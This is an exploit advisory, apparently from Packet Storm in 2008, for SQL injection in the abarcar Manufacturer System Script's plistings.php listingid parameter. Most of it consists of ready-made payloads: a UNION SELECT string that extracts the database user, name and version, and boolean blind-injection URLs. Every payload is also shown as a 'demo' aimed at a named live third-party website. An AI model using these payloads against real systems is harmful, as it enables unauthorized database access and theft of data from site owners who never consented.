Abarcar Manufacturing System Script SQL Injection

2008-12-31T00:00:00
ID PACKETSTORM:73496
Type packetstorm
Reporter ZoRLu
Modified 2008-12-31T00:00:00

Description

                                        
                                            `[~] abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj  
[~]  
[~] plistings.php (listingid) sql inj  
[~]  
[~] http://www.abarcar.com/content_17.php  
[~]----------------------------------------------------------  
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com  
[~]  
[~] Date: 31.12.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com / www.experl.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~] -----------------------------------------------------------  
  
Exploit: ( remote )  
  
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]  
  
[SQL]=   
  
-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--  
  
  
exploit for demo:  
  
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--  
  
  
Exploit: ( blind )  
  
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )  
  
http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )  
  
  
exploit for demo:  
  
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )  
  
http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: yildirimordulari.org & experl.com  
[~]  
[~]----------------------------------------------------------------------  
`